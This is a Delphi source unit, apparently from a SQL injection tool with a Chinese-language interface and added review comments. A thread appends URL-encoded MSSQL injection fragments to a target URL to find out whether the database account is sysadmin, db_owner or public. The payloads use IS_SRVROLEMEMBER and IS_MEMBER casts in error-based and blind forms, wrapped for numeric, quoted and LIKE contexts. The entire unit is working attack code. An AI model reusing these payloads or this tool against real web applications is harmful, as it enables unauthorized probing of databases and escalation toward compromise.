unit ThreadUserPower;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms;
type
// Worker thread that probes one injectable URL for the privilege level of the
// database account behind it (sysadmin / db_owner / public) and writes the
// result into Form_main (see GetUserPower in the implementation section).
TThreadUserPower = class(TThread)
// Base URL that the probe fragment is appended to. Declared before any
// visibility keyword, so it takes the class's default visibility; it is not
// assigned anywhere in this unit — presumably set by whoever creates the
// thread — and is read by Execute.
FURL:string;
private
private // duplicate specifier; harmless but redundant
// Builds the probe URL and decides the privilege level; called from Execute.
procedure GetUserPower(str_url:string);
// Returns the HTTP status code reported by a TThreadHttpGetHead for URL.
function GetURLCode(URL: string): integer;
published
// NOTE(review): Execute is normally overridden under protected; published
// compiles but is unusual — confirm nothing relies on RTTI for it.
procedure Execute; override;
public
end;
implementation
uses
main_unit,CJdatabase_unit,define_unit,ThreadHttpGet;
//******************************************************************************
// Thread body: run the privilege check against FURL, then bump the global
// completion counter (ThdObjCompleteCount comes from one of the used units;
// its type is not visible here).
procedure TThreadUserPower.Execute;
begin
GetUserPower(FURL);
// NOTE(review): plain read-modify-write of a shared global from a worker
// thread with no Interlocked* or lock; if several of these threads finish
// at the same time an increment can be lost — confirm how callers use it.
ThdObjCompleteCount:=ThdObjCompleteCount+1;
end;
//*****************************************************************************
//Function: get the database user's privilege level
// Determines the privilege level of the database account reachable through
// the injectable URL and writes it to Form_main.suiEdit_power.Text.
//   str_url - base URL; the probe fragment (str_ext) is appended to it.
// Reads two globals: cjdatabase_unit.Database_methord (1 = error-based,
// 2 = blind/brute-force, per the author's note below; 0 exits before anything
// is written; other values fall through to 'public') and Inject_methord
// (1..3 choose how the fragment is wrapped; 0 exits without a result).
// Outcome, tried in order: 'sysadmin' (displayed as 'SA'), then 'db_owner',
// otherwise 'public'.
// NOTE(review): Form_main.suiEdit_power.Text is assigned directly from this
// worker thread with no Synchronize; VCL controls are not thread-safe —
// confirm this is intended.
// NOTE(review): locals i and IdGetObj are declared but never used.
// NOTE(review): power and URL are never explicitly initialised; the
// power='' tests rely on Delphi zero-initialising local string variables.
// Detection note: the IS_SRVROLEMEMBER / IS_MEMBER / char(94) fragments built
// below are a distinctive signature in web-server and WAF logs.
procedure TThreadUserPower.GetUserPower(str_url:string);
var
i :integer;
power:string;
URL:string;
str_ext:string;
IdGetObj:TThreadHttpGet;
begin
{ Approach: for the error-based method the privilege flag is cast to varchar
  and compared with an integer so the server's error text carries the value;
  for the brute-force (blind) method integer is compared with integer and only
  the response is inspected. }
// Build a different statement for each database error-reporting type
case cjdatabase_unit.Database_methord of
1 : begin
str_ext:='%20And%20(char(94)%2Bcast(IS_SRVROLEMEMBER(''sysadmin'')%20as%20varchar(1))%2Bchar(94))>0';
case Inject_methord of
0: begin
// (commented-out warning dialog: "this injection URL may not be injectable,
//  unknown injection method")
//Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
end;
2: begin
str_ext:='%20And%20(IS_SRVROLEMEMBER(''sysadmin''))=1';
case Inject_methord of
0: begin
// (commented-out warning dialog, same text as above)
//Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
end;
end;
// Evaluate the response differently depending on the statement type:
// error-based compares GetURLMsg's text with '1', blind compares the status code with 200.
case cjdatabase_unit.Database_methord of
0: exit;
1: begin
if define_unit.GetURLMsg(URL)='1' then
begin
power:='sysadmin';
Form_main.suiEdit_power.Text:='SA';
end;
end;
2: begin
if GetURLCode(URL)=200 then
begin
power:='sysadmin';
Form_main.suiEdit_power.Text:='SA';
end;
end;
end;
// Check whether the user is 'dbo' (only reached when the sysadmin probe was negative)
if power='' then
begin
case cjdatabase_unit.Database_methord of
1 : begin
str_ext:='%20And%20(char(94)%2Bcast(IS_MEMBER(''db_owner'')%20as%20varchar(1))%2Bchar(94))>0';
case Inject_methord of
0: begin
// (commented-out warning dialog, same text as above)
//Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
end;
2: begin
str_ext:='%20And%20(IS_MEMBER(''db_owner''))=1';
case Inject_methord of
0: begin
// (commented-out warning dialog, same text as above)
//Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
end;
end;
// Evaluate the response differently depending on the statement type
case cjdatabase_unit.Database_methord of
0: exit;
1: begin
if define_unit.GetURLMsg(URL)='1' then
begin
power:='db_owner';
Form_main.suiEdit_power.Text:='db_owner';
end;
end;
2: begin
if GetURLCode(URL)=200 then
begin
power:='db_owner';
Form_main.suiEdit_power.Text:='db_owner';
end;
end;
end;
end; //end of if
// Neither probe matched: report the lowest level.
if power='' then
begin
power:='public';
Form_main.suiEdit_power.Text:='public';
end;
end;
//*****************************************************************************
// Fetches URL through a TThreadHttpGetHead helper thread and returns the HTTP
// status code it reports (IdGetObj.iCode). Result is pre-set to 0 but is
// only returned as 0 if an exception escapes before iCode is read.
//   URL - full probe URL handed to the helper thread.
// NOTE(review): the helper is created inside the try, so if Create raises the
// finally block frees an uninitialised reference; the usual Delphi shape is
// Create before try.
// NOTE(review): this runs on a TThread (Execute -> GetUserPower -> here) yet
// pumps Application.ProcessMessages in its wait loop; VCL message handling
// from a worker thread is not safe — confirm intent.
// NOTE(review): the loop exits only when the helper sets Success; this
// assumes the helper also sets it on timeout (TimeOut is not declared in this
// unit — presumably a global from a used unit), otherwise it spins forever.
function TThreadUserPower.GetURLCode(URL: string): integer;
var
IdGetObj:TThreadHttpGetHead;
begin
try
Result := 0;
IdGetObj:=TThreadHttpGetHead.Create(true); // created suspended, started by Resume below
IdGetObj.TimeOut:=TimeOut;//timeout, 30 seconds per the original comment
IdGetObj.FURL:=URL;
IdGetObj.Success:=false;
IdGetObj.Resume;
// Poll every 50 ms until the helper flags completion.
while not IdGetObj.Success do
begin
application.ProcessMessages;
sleep(50);
end;
Result :=IdGetObj.iCode;
finally
IdGetObj.Free;
IdGetObj:=nil;
end;
end;
end.